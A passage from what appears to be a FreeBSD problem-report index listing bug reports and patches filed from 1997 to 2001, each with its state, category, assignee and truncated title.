added to fetc s [1997/07/28] kern/4184 [PATCH] minor nits in sys/netatalk o [1997/08/08] misc/4249 wpaul ypchsh doesn't care about changing a user o [1997/08/13] kern/4297 dufault SIGEV_NONE and SIGEV_SIGNAL go in signal. o [1997/08/13] i386/4300 msmith The initial timeout on open("/dev/lpt0".. o [1997/08/14] ports/4304 portmgr Recommendation re. Ports Collection o [1997/08/29] kern/4413 No way to unmount a floppy that goes bad o [1997/08/29] bin/4419 man can display the same man page twice o [1997/08/29] bin/4420 roberto find -exedir doesn't chdir for first entr o [1997/09/03] bin/4459 bde No prototype for moncontrol(3) and monsta o [1997/09/25] bin/4629 calendar doesn't print all dates sometime o [1997/09/28] misc/4646 qa Can't fixit with an NFS-mounted CD. o [1997/10/05] bin/4696 ping hangs on certain unresolvable hosts f [1997/10/15] gnu/4771 diff to correct misleading total bytes in o [1997/10/24] kern/4845 qa Boot complains about disk slices in FAT p o [1997/11/13] bin/5031 gad lpr does not remove original file if -s i s [1997/11/28] bin/5173 [PATCH] restore ought to deal with root s s [1997/11/30] i386/5182 bde [PATCH] A patch support high speed serial s [1997/12/14] bin/5296 slattach fails creating pidfile with ioct o [1997/12/22] kern/5362 peter mount incorrectly reports / as an NFS exp s [1998/01/03] bin/5419 [PATCH] timed rejects valid networks with o [1998/01/11] bin/5483 Login(1) clears utmp entry s [1998/01/20] kern/5532 [PATCH] Dropped packet counts are inaccur o [1998/01/26] kern/5577 bde Unnecessary disk I/O and noatime ffs fixe a [1998/01/28] bin/5591 jkoshy Trouble with LD_PRELOAD environment varia o [1998/01/31] bin/5609 gad lpd cannot send long files to HP's JetDir o [1998/02/09] kern/5689 phk sysctl vm.vmmeter - bogus and unsupported o [1998/02/10] bin/5712 mikeh /bin/chio code cleaup and option added o [1998/02/14] bin/5745 nik [PATCH] Add /usr/local/share/mk to defaul o [1998/02/26] kern/5863 Kernel support for sorted SHUTDOWN & SHUT a [1998/03/06] i386/5932 perfmon kernel code should check for non- f [1998/03/28] bin/6161 assar 2.2.6 kerberos servers are awfully visibl p [1998/03/31] bin/6183 iedowse quota hangups p [1998/03/31] kern/6184 No error if resulting file pos in lseek i a [1998/04/16] misc/6320 mike Sometimes nohup isn't good enough. o [1998/04/18] conf/6346 joe Kernel version strings need to relate to o [1998/05/12] misc/6612 bsd.man.mk can't handle man pages with ": o [1998/05/13] conf/6624 davidn One class with nologin=/etc/nologin: reje s [1998/05/17] kern/6668 babkin [PATCH] new driver: Virtual Ethernet driv s [1998/05/29] bin/6785 place for all the default dump flags s [1998/06/01] kern/6820 jesper cd9660_mount NULL pointer deref for no CD o [1998/06/22] ports/7023 portmgr bsd.port.(%|subdir.).mk patches for size s [1998/06/28] i386/7100 hm integrate pcvt configuration into the /et a [1998/07/01] bin/7136 kerberized telnetd doesn't use gettytab % s [1998/07/10] misc/7232 qa Suggestion for FreeBSD installation dialo o [1998/07/10] kern/7234 yokota keyboard problems during login immediatel o [1998/07/12] bin/7265 A warning flag is added to ln(1). f [1998/07/15] bin/7287 Incorrect domain name for MAP_UPDATE in m a [1998/07/19] bin/7324 Suggestions for minor modifications to ad s [1998/08/13] conf/7606 [PATCH] NIS Makefile.dist: NOPUSH replace s [1998/08/18] bin/7669 libalias does not IRC DCC packets under c o [1998/08/19] ports/7687 dinoex description of default baud rate for cu c s [1998/08/22] kern/7722 Changes to acct format s [1998/09/08] bin/7868 [almost patch]Morse Code Fixups o [1998/09/16] misc/7946 asami ccdconfig gives confusing error when give o [1998/09/18] bin/7973 gad lpd: Bad control file owner in case of re s [1998/09/21] kern/8015 nbm [patch] Some sysctl descriptions for the o [1998/09/27] ports/8063 portmgr [PATCH] Add multiple CDROM support to bsd o [1998/10/03] misc/8133 markm [patch] bug in telnetd (Kerberos IV) o [1998/10/19] kern/8376 CLOCK_VIRTUAL not implemented o [1998/10/27] i386/8474 repquota does not pick up NIS information a [1998/10/28] bin/8479 dd Final \'s in /etc/exports did not work in f [1998/10/30] kern/8498 dwmalone Race condition between unp_gc() and accep o [1998/11/27] i386/8867 qa /stand/sysinstall core dumps (signal 11) o [1998/12/16] ports/9107 portmgr Addition to bsd.port.mk for searching mul a [1998/12/18] bin/9123 kris pax can't read tar archives that contain f [1998/12/28] misc/9220 ache nvi: catalog: mistake in Russian error me o [1998/12/29] bin/9233 gmp's mpq_add and mpq_sub are buggy a [1999/01/05] bin/9333 jkoshy timestamp dump's progress o [1999/01/19] kern/9570 dfr ed(4) irq config enhancement o [1999/01/22] kern/9619 Restarting mountd kills existing mounts f [1999/01/25] kern/9679 fix for uninterruptible open in portal fi a [1999/01/28] bin/9770 kris An openpty(3) auxiliary program o [1999/01/29] i386/9777 cg Generic AD1816 sound suport in Luigi's pc o [1999/01/31] ports/9840 portmgr patch allows ports to fetch their sources o [1999/02/01] bin/9868 Patch to add "date -a" o [1999/02/01] kern/9869 When using macros out of function, they s o [1999/02/01] conf/9874 idle-timeout facilities in /etc/login.con o [1999/02/09] i386/9991 new driver for National Instruments GPIB o [1999/02/11] bin/10030 markm Kerberized telnet fails to encrypt when a o [1999/02/25] docs/10240 wosch We need a script which check if our web m f [1999/02/26] bin/10283 Race condition in rc.network o [1999/03/02] bin/10358 yar ftp(1) has problems with long pathnames f [1999/03/07] i386/10465 mdodd Must disable ex0 to install. f [1999/03/15] kern/10609 adjtime bug (tv_sec > 2147) and enhanceme o [1999/03/15] bin/10611 timed enhancement o [1999/03/17] kern/10641 groudier Default sync rate in ncr SCSI driver is s o [1999/03/19] gnu/10670 peter cvs doesn't allow digits in local keyword o [1999/03/19] kern/10673 wpaul Non-ASCII chars on serial console with Re o [1999/03/19] ports/10682 portmgr List mirror sites in MASTER_SITE_BACKUP - o [1999/04/08] kern/11020 popen does not honor ISO 9899 syntax o [1999/04/08] bin/11036 markm Perl does not honor -DNOMAN o [1999/04/11] bin/11085 Per-host configuration for syslog.conf p [1999/04/11] bin/11092 johan readlink(1) from OpenBSD f [1999/04/13] bin/11114 tjr make(1) does not work as documented with o [1999/04/14] ports/11134 hoek existense of /usr/obj/usr/ports/shells/ba o [1999/04/16] i386/11165 IBCS2 don't work correctly with PID_MAX 9 a [1999/04/16] bin/11168 davidn pw(8) usermod does not recognize -w flag f [1999/04/20] bin/11236 mountd fails to properly check for kernel o [1999/04/23] kern/11293 brian FreeBSD's PPP implementation of LQM appea o [1999/04/23] bin/11294 direct logging to other hosts (no local s o [1999/05/19] kern/11789 obrien ELF machine definition missing for ARM f [1999/05/29] bin/11929 symorder doesn't work on elf format objec o [1999/06/03] kern/12014 alfred Fix SysV Semaphore handling o [1999/06/06] gnu/12046 markm Perl subsystem does not install all tutor o [1999/06/07] kern/12071 [PATCH] large scale IP aliasing o [1999/06/08] i386/12088 Enhancement to ed driver for Linksys 10/1 o [1999/06/16] bin/12244 realpath() fails when there is no permiss o [1999/06/18] bin/12280 jdp LD_IGNORE_MISSING_OBJECTS not honored for o [1999/06/21] conf/12324 qa Sysinstall's fdisk partition editor is mi o [1999/06/21] ports/12325 portmgr Adds refetch functionallity to bsd.port.m o [1999/06/26] bin/12398 fsck in free(): warning: pointer to wrong o [1999/07/06] kern/12543 dg [PATCH] cumulative error counters for fxp o [1999/07/07] bin/12545 peter kldload(8) should be more sensitive to er o [1999/07/08] ports/12566 billf a guide to pyrotechnics o [1999/07/25] bin/12801 nvi infinite recursion with options "left o [1999/08/04] ports/12952 portmgr make _PORT_USE touch cookies by variable, f [1999/08/04] kern/12966 silby receiver lockups in vr0 driver f [1999/08/05] i386/12993 gibbs "ahc0: Data Parity Error Detected during o [1999/08/09] bin/13042 make doesn't handle wildcards in subdirec o [1999/08/09] bin/13043 minigzip -c option support. o [1999/08/11] bin/13068 billf Don't stamp out score files! o [1999/08/12] bin/13108 authunix_create_default includes egid twi a [1999/08/13] bin/13128 cy pkg_delete doesn't handle absolute pathna f [1999/08/18] kern/13232 panic("rtfree"); when sending bootp reque o [1999/08/21] bin/13309 billf Fixes to nos-tun o [1999/08/22] misc/13326 additional timeval interfaces for ' cannot be used in "via" o [2000/05/30] kern/18909 dwmalone select(2) timeout limited to 100000000 se o [2000/06/01] ports/18960 portmgr Add USE_APACHE to bsd.port.mk for Apache o [2000/06/01] bin/18961 green sshd does not print before motd o [2000/06/03] bin/18992 brian log packets blocked by filter rules o [2000/06/03] misc/18997 markm Kerberos5 CFLAGS needed o [2000/06/06] ports/19051 asami New target for bsd.port.mk : fetchdepends o [2000/06/07] ports/19112 portmgr files with names something,v in patches d o [2000/06/11] kern/19213 SC_DFLT_FONT compile option breaks kernel f [2000/06/13] conf/19236 sanpei not-existing PCMCI cards in pccard.conf.s o [2000/06/13] misc/19246 portmgr Poor error message when fetching files wi o [2000/06/13] ports/19253 dirk mod_php4 has pkg dependency when not usin o [2000/06/14] ports/19270 portmgr Ports build mechanism doesn't check wheth f [2000/06/15] gnu/19327 Fix to build 'a.out' binary. o [2000/06/19] misc/19391 emulationEvilness with Linux Terminus, causes X to o [2000/06/20] misc/19406 setenv() allocates memory which is not fr o [2000/06/22] ports/19448 markm filename input broken o [2000/06/23] misc/19467 green OpenSSH (as an rsync tunnel) blocks forev o [2000/06/26] kern/19535 adrian procfs_rlimit tidyup s [2000/06/28] conf/19573 des Dot Files for Optional Shells o [2000/06/29] ports/19591 ports ssh2 port ignores 'ignorenologin' from lo o [2000/06/30] ports/19594 trevor update port: qrash o [2000/07/01] bin/19635 add -c for grand total to df(1), like du( o [2000/07/02] gnu/19642 kbyanc patch to merge OpenBSD changes to patch(1 o [2000/07/02] ports/19650 asami python package causes segmentation fault o [2000/07/03] bin/19683 green mount displays incorrect mount point on f a [2000/07/03] kern/19686 yokota splash screen fails o [2000/07/05] kern/19720 kbyanc more sysctl signed-ness patches o [2000/07/07] kern/19756 Inability to use linux extended partition f [2000/07/07] bin/19772 df output wrong for union-mounts o [2000/07/08] kern/19782 dirk mkisofs 1.12.1 (i386-unknown-freebsd4.0) f [2000/07/09] misc/19798 cg 4DWAVE doesn't work. o [2000/07/10] kern/19827 yokota psm flag bit9(NOIDPROBE) doesn't work cor o [2000/07/10] misc/19837 ambrisko Run Fit it floppy from serial port o [2000/07/12] ports/19868 portmgr modify ports/Mk/bsd.port.mk to remove ALL o [2000/07/12] kern/19871 alfred select on named pipes always returns 'ava o [2000/07/14] kern/19913 des add SYN+FIN counter o [2000/07/15] kern/19966 new syscons screensaver o [2000/07/18] gnu/20004 FBSD4 gcc __attribute__(constructor) not p [2000/07/19] bin/20042 iedowse "rsh -t" doesn't timeout if rcmd(3) never o [2000/07/20] bin/20054 ftpd: rotating _PATH_FTPDSTATFILE losts x o [2000/07/24] misc/20139 msmith Simple typo in src/share/examples/ppi/ppi o [2000/07/24] misc/20166 billf Corrections & additions to games/quiz/dat o [2000/07/26] bin/20204 ps more doesn't handle 8-bit characters prop o [2000/07/27] kern/20214 dec kernel routing bug for nexthop is routed o [2000/07/28] ports/20270 reg libtool needlessly runs ldconfig after in o [2000/07/29] kern/20297 cg Joystick is not enabled with es1370 based o [2000/07/31] misc/20326 marcel [PATCH] installkernel fails if DESTDIR is o [2000/07/31] misc/20333 ftp login fails on unix password when s/k o [2000/08/01] kern/20352 yokota Configuring a synaptics touchpad o [2000/08/02] ports/20359 demon New port: Apache-mod_perl_guide f [2000/08/02] bin/20371 murray dhclient inserts bogus configurations o [2000/08/03] kern/20384 n_hibma Phase errors with Zip650 CD on USB o [2000/08/03] kern/20389 ken "device pass" required for CD ripping o [2000/08/03] bin/20391 jhb sysinstall should check debug.boothowto s o [2000/08/04] kern/20410 sio support for high speed NS16550A, ST16 p [2000/08/05] conf/20436 iedowse Can't make only cd0 under 4.1-STABLE o [2000/08/07] misc/20457 davidn pw command doesn't generate random passwo o [2000/08/09] bin/20501 mjacob extra flag to dump to offline autoloaders a [2000/08/10] ports/20520 olgeni New port: lang/mercury o [2000/08/10] docs/20528 doc sysconf(3) manpage doesn't mention posix. o [2000/08/10] kern/20529 wpaul gigabit cards fail to link o [2000/08/11] i386/20537 msmith HP NetRAID controller error when rebootin a [2000/08/14] ports/20610 patrick New port of cgoban2 o [2000/08/15] bin/20613 des fetch -T n is not timeout correctly when o [2000/08/16] i386/20660 wpaul if_wi provides 802.11 src and dst, not et o [2000/08/17] ports/20678 portmgr make SORTED_MASTER_SITES_CMD variable ove o [2000/08/21] bin/20742 ps Weird problem with 'more' on 4-1-STABLE o [2000/08/23] ports/20795 msmith FBSD 4.x: Citrix client with drive mappin o [2000/08/23] bin/20799 davidn top's problem o [2000/08/23] i386/20803 mdodd ep0 driver finds additional "shadow" ep c o [2000/08/23] kern/20804 deadlocking when using vnode disk file an o [2000/08/24] bin/20824 ftpd returns, "ad0s1a: not a plain file." o [2000/08/24] misc/20830 lile kernel link problems with Olicom token ri f [2000/08/25] i386/20845 Cyclades cy driver incompatible with Cycl o [2000/08/26] kern/20878 wpaul Patch to add support for the 3c556B MiniP o [2000/08/26] bin/20881 kris There's no reason not to build DNSsec-DSA o [2000/08/27] bin/20889 dwmalone syslogd.c still uses depreciated domain A o [2000/08/28] bin/20908 qa /stand/sysinstall too limited in selectio o [2000/08/29] misc/20920 yokota window(1) interferes with screensaver o [2000/08/29] kern/20927 ume dmesg output: looutput: mbuf allocation f o [2000/08/30] bin/20944 ru natd enhancements, default config file an o [2000/09/02] bin/20996 kris permissions on /usr/bin/opiepasswd o [2000/09/02] bin/21008 gad Fix for lpr's handling of lots of jobs in o [2000/09/04] bin/21024 pow() ERANGE bug o [2000/09/05] conf/21059 marcel `make -jN buildkernel' can't keep source o [2000/09/05] conf/21066 dougb Proposed change in rc scripts o [2000/09/05] misc/21070 marcel default setting of ${SUP} in Makefile.inc o [2000/09/06] bin/21074 davidn chkgrp vs group(5) inconsistency f [2000/09/06] bin/21075 dwmalone top: can't allocate sufficient memory o [2000/09/06] bin/21080 mjacob dump doesn't use eject tape device correc o [2000/09/09] kern/21156 yokota [PATCH] inconsistency in scmouse vs xterm s [2000/09/10] bin/21178 ken voltag selector, and unload support for c o [2000/09/12] kern/21222 dillon wrong behavior of concurrent mmap()s on N o [2000/09/12] kern/21229 Proper value for vfs.nfs.access_cache_tim o [2000/09/16] bin/21312 more incorrectly redraws screen on xterm o [2000/09/16] bin/21315 Shells often behave oddly when executing o [2000/09/24] bin/21519 sys/dir.h should be deprecated some more f [2000/09/26] bin/21570 dougb [PATCH] Add -r option to /usr/bin/mail, q o [2000/09/28] ports/21621 portmgr Update port: devel/libtool to 1.3.5 f [2000/09/28] kern/21623 wpaul Chipset SiS630E / NIC SiS 900 o [2000/09/29] misc/21644 /usr/include/sys/mman.h uses a type defin s [2000/09/30] bin/21659 Berkeley db library is statically compile o [2000/10/01] i386/21672 obrien AMD Duron Rev. A0 reports incorrect L2 ca o [2000/10/01] misc/21675 Better and more disktab entries for MO dr o [2000/10/02] conf/21695 ifconfig_XXX_aliasY in rc.conf; Y must be o [2000/10/02] misc/21715 The freebsd mail list digifier loses MIME o [2000/10/04] bin/21751 ken libcam's cam_real_open_device() may lose o [2000/10/04] kern/21754 n_hibma Sound stops working when NetGear USB Devi o [2000/10/05] bin/21766 [PATCH] add -s (skip) flag to head(1) o [2000/10/05] kern/21768 rwatson shouldn't trailing '/' on regular file sy a [2000/10/06] kern/21807 fs [patches] Make System attribute correspon o [2000/10/07] docs/21826 wollman ARP proxy feature lacks documentation o [2000/10/09] kern/21859 Allow the syncer to be slowed down o [2000/10/09] ports/21885 portmgr bsd.port.mk: test for old layout is too o [2000/10/10] ports/21903 portmgr bsd.ports.mk - automake/aclocal adds o [2000/10/14] conf/21994 Config of Anonftp (at install) always cre p [2000/10/14] gnu/21996 use of -s and -C causes tar to dump core o [2000/10/16] bin/22033 [PATCH] to pw(8) to allow encrypted passw o [2000/10/16] bin/22034 nfsstat lacks useful features found in So o [2000/10/17] kern/22065 luigi Patch to add support to ipfw for per rule o [2000/10/18] misc/22073 xonsole: couldn't open console o [2000/10/18] conf/22102 Local scripts get run before securelevel o [2000/10/20] ports/22149 portmgr Enhance the "Old port layout" message fro o [2000/10/21] bin/22182 vi options noprint/print/octal broken f [2000/10/21] misc/22190 A threaded read(2) from a socketpair(2) f o [2000/10/21] bin/22198 inet_ntop may set errno to ENOSPC and nee o [2000/10/26] conf/22308 mounting NFS during boot blocks if host m s [2000/10/27] bin/22351 green sed(1) fails with backslash on buffer bou o [2000/10/29] ports/22399 msmith PIB 1.2 still looks for MD5 info in files o [2000/10/30] ports/22412 taoka two extraneous ports and one name change o [2000/10/31] bin/22442 greid [PATCH] Increase speed of split(1) o [2000/11/02] ports/22550 cy Patch for conserver for log file rotation o [2000/11/04] bin/22612 schweikh crontab -e failures o [2000/11/07] misc/22660 schweikh termcap kterm entry tc=xterm is wrong a [2000/11/08] misc/22696 luigi picobsd build with router configuration c o [2000/11/08] ports/22698 portmgr Ports' rc.d files should use rc.conf o [2000/11/09] bin/22730 fenner tcpslice doesn't handle long file offsets o [2000/11/14] bin/22860 yar [PATCH] adduser & friends with '$' in use o [2000/11/14] docs/22861 dd newsyslog man page is misleading and inco o [2000/11/15] kern/22868 getsockname may return an incorrect addre o [2000/11/15] misc/22873 markm Perl's core'h conflicts with ncurses.h o [2000/11/16] i386/22900 patch: Adds Brand ID support to src/sys/i o [2000/11/17] misc/22914 bootinst messages are not updated s [2000/11/17] conf/22916 green Ssh/sshd binaries lacks kerberos support o [2000/11/17] bin/22933 green Typographical error in ssh.1 f [2000/11/20] ports/22995 grog Update port: x11-servers/x2x (fix ports/2 o [2000/11/23] conf/23063 ru [PATCH] for static ARP tables in rc.netwo o [2000/11/24] bin/23082 dwmalone ntpd has only one reference-clock parser f [2000/11/25] bin/23097 Enhance WEP some more including ability t o [2000/11/27] misc/23148 getopt(3) works non-intuitively? o [2000/11/29] bin/23178 'talk' not doing right thing o [2000/11/29] bin/23180 Certain KOI8 characters are treated as "w o [2000/12/01] bin/23204 length of salt in crypt() is not the same o [2000/12/02] bin/23233 kris Reincorporate /usr/bin/error in the FreeB a [2000/12/03] bin/23254 fenner yacc accepts bad grammer o [2000/12/05] kern/23304 standardsPOSIX clock_gettime, clock_getres return f [2000/12/05] kern/23314 aic driver fails to detect Adaptec 1520B f [2000/12/07] misc/23362 fenner tcpdump wrong on sppp CISCO_HDLC encoded o [2000/12/07] misc/23366 mmap() non conforming o [2000/12/07] gnu/23367 some src/gnu Makefiles are missing $FreeB a [2000/12/09] conf/23402 qa sysinstall upgrade ought to check partiti p [2000/12/11] bin/23472 mp gdb weirdness on programs compiled with - o [2000/12/13] kern/23520 sb0 old style audio support in 4.2-RELEAS o [2000/12/13] misc/23539 marcel make installworld from nfs mounted /usr/s o [2000/12/14] kern/23546 tanimura [PATCH] csa DMA-interrupt problem o [2000/12/14] ports/23560 portmgr linux-jdk/Makefile assumes default `patch o [2000/12/15] i386/23562 telnetd doesn't show message in file spec o [2000/12/15] ports/23581 portmgr Updates to bsd.port.mk to detect changing o [2000/12/17] gnu/23598 Merge libgcc_r with libgcc o [2000/12/17] ports/23602 portmgr Recursive distclean for bsd.port.mk w/pat o [2000/12/18] bin/23635 mike [PATCH] whois enhancement - smarter whois f [2000/12/24] kern/23814 .au sound files < 528 bytes actual data d o [2000/12/24] ports/23822 trevor mtree entries for German X11 man pages a [2000/12/28] bin/23912 sheldonh underflow of cnt in vs_paint() by O_NUMBE o [2000/12/29] bin/23944 Patch for ftpd to add a cd after the chro o [2001/01/04] bin/24066 mp gdb can't detach from programs linked wit o [2001/01/06] ports/24120 portmgr "/usr/ports/Mk/bsd.port.mk", line 626: In p [2001/01/07] misc/24132 mp gdb output is wrong (same as #13427 ?) o [2001/01/07] kern/24141 sound emu10k1 has trouble playing non-44.1KHz s o [2001/01/10] ports/24214 portmgr [PATCH] verbose 'make index' o [2001/01/11] ports/24259 steve port of open-motif on make install compla o [2001/01/12] ports/24292 portmgr update-patches target in ports/Mk/bsd.por o [2001/01/12] ports/24299 ports Configure the synaptics touchpad. o [2001/01/15] ports/24361 portmgr wrong filemodes o [2001/01/16] misc/24384 4.1 Cant add entry to neighbour discovery o [2001/01/16] bin/24390 Replacing old dir-symlinks when using /bi p [2001/01/16] kern/24393 trhodes Patch to msdosfs to handle a kind of inco o [2001/01/18] bin/24435 Changing slice type causes Auto-partition o [2001/01/20] bin/24485 [PATCH] to make cron(8) handle clock jump o [2001/01/20] ports/24493 msmith Pib maker function unable to launch xterm a [2001/01/21] kern/24512 jesper Sent ICMP unreach when packet not for us o [2001/01/21] misc/24513 peter new options for pppd o [2001/01/21] conf/24515 Fix for find(1) warning in /etc/rc o [2001/01/21] bin/24521 green ssh-agent exits when authenticating DSA v o [2001/01/22] kern/24528 Bad tracking of Modem status o [2001/01/23] bin/24592 cjc dmesg.boot Gets Overwritten without Reboo o [2001/01/25] ports/24651 mharo portlint gives a bogus warning o [2001/01/26] alpha/24663 alpha Console output gets scribbled into /var/l o [2001/01/27] gnu/24681 gcc 2.95.3 cannot compile rince.c from IO o [2001/01/27] ports/24687 ports QUAKE FORGE & SVGALIB o [2001/01/30] ports/24736 trevor New port: SGI's open inventor (graphics/i o [2001/01/30] bin/24742 send adduser.message before dirs are crea o [2001/01/30] ports/24743 chuckr a2ps port installs files in / o [2001/01/30] misc/24746 green SSH terminal hangs on large paste of data o [2001/01/30] ports/24749 dirk mysql323-server pkg-install script doesn' o [2001/01/31] bin/24757 yar ftpd not RFC compliant o [2001/02/01] docs/24786 doc missing FILES descriptions in sa(4) o [2001/02/02] docs/24797 phk when using MALLOC_DEFINE sys/param.h and o [2001/02/03] kern/24827 yokota Erratic Intellimouse Explorer in 4.1 and f [2001/02/04] gnu/24844 gdb does not support Linux threads a [2001/02/05] docs/24869 keramida Some text elf.5 is duplicated o [2001/02/05] kern/24882 ktrace not syncing .out file before panic o [2001/02/06] kern/24902 IPC Message Queue number to big o [2001/02/06] misc/24907 qa Options screen at MenuMedia menu problem o [2001/02/07] ports/24940 demon prolem with Tnm::icmp echo command due to o [2001/02/08] bin/24953 green adduser ignores passwd_format in login.co o [2001/02/08] kern/24959 jesper proper TCP_NOPUSH/TCP_CORK compatibility o [2001/02/08] i386/24963 perfmon(4) doesn't work on SMP systems o [2001/02/09] ports/24983 portmgr Emacs ports have misleading names p [2001/02/11] bin/25012 tar(1) as root does not preserve ownershi o [2001/02/11] bin/25013 mv(1) cannot move unresolvable symlinks a o [2001/02/11] bin/25015 cp: options -i and -f do not work as docu p [2001/02/11] docs/25016 ru symlink(7) manpage says symlinks have no o [2001/02/11] bin/25017 cp -pRP does not preserve symlink ownersh o [2001/02/11] kern/25018 lstat(2) returns bogus permissions on sym o [2001/02/12] ports/25031 ache www/apache: dbmmanage fails verifying md5 o [2001/02/13] bin/25070 newsyslog(8) should send signals only onc o [2001/02/13] bin/25085 msmith mlxcontrol utility fails silently if devi o [2001/02/15] misc/25109 Fujitsu MO device MCC3064AP could't be c o [2001/02/19] misc/25218 peter mailwrapper invokes sendmail when resourc o [2001/02/20] bin/25241 luigi ipfw shouldn't show dynamics rules when s f [2001/02/21] bin/25263 green openssh and /etc/login.access does not wo o [2001/02/21] bin/25273 add fs type feature to vnconfig(8) to all f [2001/02/21] kern/25275 X server freezes system randomly on pentu f [2001/02/22] bin/25278 dd bs accepts -s -c but not -sc o [2001/02/22] alpha/25284 alpha PC164 won't reboot with graphics console o [2001/02/23] ports/25313 wosch Script source displayed at http://www.nl. o [2001/02/26] misc/25378 kris update contrib/libgmp to newer version (3 o [2001/02/26] kern/25386 cg Incorrect mixer registers (line & synth) o [2001/02/27] kern/25445 kernel statistics are displayed in wrong f [2001/02/28] gnu/25459 Dumpvalue.pm says SYNOPSYS instead of SYN o [2001/02/28] bin/25462 daemon(3) fails if called by a session le f [2001/02/28] i386/25463 PS/2 mouse sync problems with KVM switch o [2001/03/01] bin/25477 billf pam_radius fix to allow null passwords fo o [2001/03/02] ports/25490 wosch [PATCH] fix various bugs in stat(1) p [2001/03/02] misc/25499 buffer paste functionality from keyboard o [2001/03/04] kern/25521 Laptop with FreeBSD4.2 freezes in battery f [2001/03/04] conf/25527 jdp `man ldconfig' does not reflect its behav o [2001/03/04] ports/25531 portmgr INSTALL_* macros fail for non-root users o [2001/03/05] ports/25564 obrien Port ups-debug doesn't build on the alpha o [2001/03/06] bin/25572 sshd core dump o [2001/03/06] ports/25576 anholt XFree86-4 port installs manual pages with o [2001/03/07] bin/25598 patch to let ftpd output message when cha s [2001/03/09] bin/25627 Cannot append hash after .elif in Makefil a [2001/03/11] ports/25708 dougb pine4 port hard-code /usr/local/include o [2001/03/11] bin/25723 green OpenSSH on 4.2 excessively regenerates RS o [2001/03/12] bin/25724 quota(1) outputs wrong limits about NFS q o [2001/03/12] kern/25733 mismatch between error reporting in smbus o [2001/03/12] bin/25736 ac -d option probrem with overdays logon f [2001/03/13] kern/25777 atime not updated on exec o [2001/03/13] ports/25779 portmgr (patch) make fetch-list should list all m o [2001/03/14] gnu/25794 markm [PATCH] make perl use a decent random num f [2001/03/14] ports/25815 portmgr [PATCH] Port build collision fix. o [2001/03/15] conf/25829 IPSec config in rc.network doesn't allow o [2001/03/16] kern/25866 more than 256 ptys, up to 1302 ptys. o [2001/03/18] kern/25909 4.x kernel freezes on P3-Asus CUSL2-C mot o [2001/03/18] kern/25910 cg Kernel sound driver may die if a program o [2001/03/19] misc/25917 green Paste thrue SSH Secure Shell v.2.4.0 (bui f [2001/03/19] kern/25923 vm_map.h defines a macro called "min_offs o [2001/03/21] misc/25984 bsd.prog.mk doesn't link C++ programs pro f [2001/03/22] docs/26003 rwatson getgroups(2) lists NGROUPS_MAX but not sy o [2001/03/22] bin/26005 MIME quoted-printable encoding added to v a [2001/03/22] docs/26006 jeff Changing zone(9) man page o [2001/03/22] kern/26016 VMWare is crash on SMP machine f [2001/03/23] misc/26035 System hangs when playing mp3 on PCI Maes o [2001/03/27] conf/26145 [PATCH] There is no make.conf equivalent o [2001/03/28] ports/26192 ports apel appeared both in xemacs/site-package o [2001/03/29] bin/26201 telnet SRA password exchange trap when no o [2001/04/01] kern/26277 ppc driver doesn't work with port 0x3BC p o [2001/04/02] docs/26286 chris *printf(3) etc should gain format string o [2001/04/02] ports/26303 adrian Wrong permission on Squid24's errors dire o [2001/04/03] kern/26316 Booting FreeBSD on VMware2 with 2 or 3 et o [2001/04/03] misc/26323 Quota system create zero-length files o [2001/04/03] kern/26324 dillon Defaults for NFS mounts over TCP are slow o [2001/04/04] kern/26348 [pcvt] scon -s, page fault in HP mode o [2001/04/04] bin/26359 [PATCH] a minor nit in how netstat detect o [2001/04/06] bin/26375 markm PAMized su allows non-wheel members to su f [2001/04/06] kern/26385 VMWare reboots entire system after starti o [2001/04/09] kern/26454 cg mixer volume settings on Maestro-2E (Diam o [2001/04/09] bin/26468 pkg_delete clears dependencies after runn o [2001/04/10] conf/26488 dougb incomplete named sandbox information a [2001/04/13] docs/26532 green ".Ql ?" becomes "`'?" through nroff (and a [2001/04/13] kern/26534 Add an option to ipfw to log gid/uid of w o [2001/04/13] kern/26547 ambrisko "lnc" problem with shared memory mode wit o [2001/04/13] i386/26562 /dev/lpt0 returns EBUSY when attempting t o [2001/04/14] kern/26563 ioctl(SNDCTL_DSP_SPEED) returns -1 when f o [2001/04/14] kern/26584 kernel boot messages aren't logged correc o [2001/04/16] kern/26618 unmount(2) can't unmount a filesystem who p [2001/04/17] misc/26646 srand() provides only 8-bit table o [2001/04/17] misc/26649 diskless client can't share root with ser o [2001/04/17] misc/26658 update to src/usr.bin/calendar/calendars/ o [2001/04/18] bin/26686 Freeze at boot from 4.3-RC4 floopies - US o [2001/04/18] misc/26695 CHANGE REQUEST: kill(all) -l output o [2001/04/20] kern/26740 rwatson [PATCH] jail improvement o [2001/04/22] kern/26787 dd sysctl change request f [2001/04/23] kern/26798 cvsup 4.3-RC -> 4.3-STABLE causes problem o [2001/04/23] ports/26801 ports cyrus port should add periodic file to pr s [2001/04/23] bin/26803 des Fix fetch to allow FTP puts in '-o' & all o [2001/04/24] i386/26812 peter old bootstrap /sys/i386/boot/... still in a [2001/04/25] bin/26854 sound Better fix for ESS Technology Maestro-2E o [2001/04/26] misc/26879 mkfilter not installed, yet referred to v s [2001/04/26] ports/26882 kde KDE should use ca-roots port for SSL cert o [2001/04/27] ports/26904 jim New port(?): net/everybuddy-i18n (i18n pa o [2001/04/28] bin/26919 qa sysinstall' fdisk can ONLY set bootable f o [2001/04/29] docs/26943 doc [patch] description of :C modifier is mis o [2001/04/30] i386/26994 obrien AMD Athlon Thunderbird not known to ident o [2001/05/01] kern/27008 kernel function sysbeep(xxx, 0) does prod o [2001/05/01] ports/27019 marcel patch supplied in PR ports/26976 breaks l o [2001/05/02] misc/27039 new syscons screensaver f [2001/05/02] misc/27041 modify src/release/Makefile to make anoth o [2001/05/04] ports/27075 sobomax Port java/javavmwrapper installs no man p o [2001/05/04] ports/27079 sobomax Improvements for javavmwrapper? o [2001/05/06] bin/27163 cracauer sh trap TSTP () deadly hangs o [2001/05/06] ports/27167 ports ETHOberonV4 won't run a [2001/05/07] ports/27182 mharo Teach portlint to recognize RUN_DEPENDS=$ f [2001/05/07] bin/27188 jon fix of rsh non-interactive mode behaviour o [2001/05/07] misc/27190 Day light savings in Mexico. o [2001/05/08] ports/27200 greid new port: bed (binary editor) o [2001/05/08] i386/27216 qa Can not get to shell prompt from serial c o [2001/05/09] kern/27232 On NFSv3 mounted filesystems, stat return o [2001/05/10] bin/27258 getty didn't check if if= isn't empty o [2001/05/11] bin/27268 fdisk does not recognize Linux extended p o [2001/05/11] kern/27269 Cannot mount linux extended (logical) par o [2001/05/11] bin/27270 cg sys/soundcard.h fails to define AFMT_S16_ o [2001/05/12] bin/27281 vidcontrol(1) does 